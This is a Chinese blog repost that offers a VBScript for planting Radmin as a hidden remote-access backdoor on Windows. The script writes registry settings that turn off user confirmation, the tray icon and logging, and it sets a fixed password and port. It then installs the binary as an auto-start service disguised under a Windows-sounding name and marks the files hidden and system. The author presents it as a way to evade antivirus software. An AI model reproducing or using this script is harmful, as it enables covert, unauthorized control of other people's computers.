利用Vbs脚本实现radmin终极后门_radmin账号添加脚本-优快云博客

本文链接：https://blog.youkuaiyun.com/Ronbi/article/details/2149836

本文介绍了一种通过修改注册表来静默安装并配置RAdmin的方法，实现远程控制功能而不会触发杀毒软件报警。该过程包括创建多个注册表项以调整RAdmin的行为参数。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

导读：
　　在网上看到N多人做radmin后门，要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用，希望大家喜欢。
　　on error resume next
　　const HKEY_LOCAL_MACHINE = &H80000002
　　strComputer = "."
　　Set StdOut = WScript.StdOut
　　Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
　　strComputer &"/root/default:StdRegProv")
　　strKeyPath = "SYSTEM/RAdmin"
　　oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
　　strKeyPath = "SYSTEM/RAdmin/v2.0"
　　oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
　　strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
　　oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
　　strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
　　oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
　　strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
　　oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
　　Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
　　BBS.bitsCN.com网管论坛
　　strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
　　uBinary = Array(1,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
　　uBinary = Array(0,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
　　uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
　　bitsCN.nET*中国网管博客
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
　　uBinary = Array(5,4,0,0) //端口：1029
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
　　uBinary = Array(10,0,0,0)
　　Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
　　Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
　　strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
　　strValueName = "LogFilePath"
　　strValue = "c:/logfile.txt"
　　set wshshell=createobject ("wscript.shell")
　　a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
　　oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
　　Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
　　[bitsCN.Com]
　　strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
　　strValueName = "Description"
　　strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
　　oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
　　strValueName = "DisplayName"
　　strValue = "Windows Management Instrumentation Player Drivers"
　　oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
　　strValueName = "ImagePath"
　　strValue = "c:/windows/system32/Exporer.exe /service"
　　oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
　　set wshshell=createobject ("wscript.shell")
　　a=wshshell.run ("net start WinManageHelp",0)
　　b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
　　c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
　　d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)

本文转自
http://www.bitscn.com/hack/safe/200802/124316.html